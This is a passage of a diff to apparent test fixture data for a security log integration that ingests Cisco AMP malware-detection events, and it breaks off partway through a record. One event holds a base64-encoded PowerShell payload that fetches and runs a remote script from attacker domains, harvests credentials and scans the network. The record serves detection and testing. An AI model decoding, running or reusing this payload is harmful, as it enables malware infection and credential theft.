+                "code": "553648147",
                 "kind": "alert",
                 "action": "Retrospective Detection",
                 "id": "6412622782676337000",
@@ -2200,8 +2227,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:41:58.139866913Z",
+                "ingested": "2021-09-30T00:15:10.798714088Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":198000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412622782676336646\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"uqlq0o884.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\uqlq0o884.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}",
+                "code": "553648147",
                 "kind": "alert",
                 "action": "Retrospective Detection",
                 "id": "6412622782676337000",
@@ -2283,8 +2311,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:41:58.139868667Z",
+                "ingested": "2021-09-30T00:15:10.798716338Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":198000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412622782676336645\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"120C.tmp\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\120C.tmp\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\",\"sha1\":\"f5a171c879b90e77861daf19741b373646d791ff\",\"md5\":\"32c9e6737dbdcbfb7563a3f27e2b1571\"}}}}",
+                "code": "553648147",
                 "kind": "alert",
                 "action": "Retrospective Detection",
                 "id": "6412622782676337000",
@@ -2366,8 +2395,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:41:58.139870423Z",
+                "ingested": "2021-09-30T00:15:10.798718576Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":183000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412622782676336644\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"QuotaGroup.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\QuotaGroup\\\\QuotaGroup.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\",\"sha1\":\"92673dd0e5f4a094fa6cd57bb301f884f2289f6c\",\"md5\":\"2f99e3456dc1d26f77c52b2119fde92f\"}}}}",
+                "code": "553648147",
                 "kind": "alert",
                 "action": "Retrospective Detection",
                 "id": "6412622782676337000",
@@ -2440,11 +2470,12 @@
             },
             "event": {
                 "severity": 2,
-                "action": "Threat Detection",
-                "ingested": "2021-09-27T00:41:58.139872187Z",
+                "ingested": "2021-09-30T00:15:10.798720929Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880683125978957000,\"timestamp\":1610640884,\"timestamp_nanoseconds\":810000000,\"date\":\"2021-01-14T16:14:44+00:00\",\"event_type\":\"Threat Detection\",\"event_type_id\":553648222,\"detection\":\"WMIPRVSE Launched Encoded Powershell Command\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"bp_data\":{\"audit\":false,\"details\":{\"actions\":[{\"action\":\"end_process\",\"end_ts\":1602033881808,\"params\":[\"10724\"],\"start_ts\":1602033881805,\"status\":\"success\"}],\"eng_epoch\":1,\"eng_ver\":\"0.9.0.104\",\"matched_activity\":{\"events\":[{\"process:start\":{\"app\":\"powershell.exe\",\"app_path\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\",\"args\":[\"powershell.exe\",\"-NoP\",\"-NonI\",\"-W\",\"Hidden\",\"-E\",\"JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAA